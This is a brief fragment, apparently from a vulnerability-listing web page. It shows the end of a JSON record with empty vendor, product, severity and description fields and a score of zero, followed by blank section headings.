    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply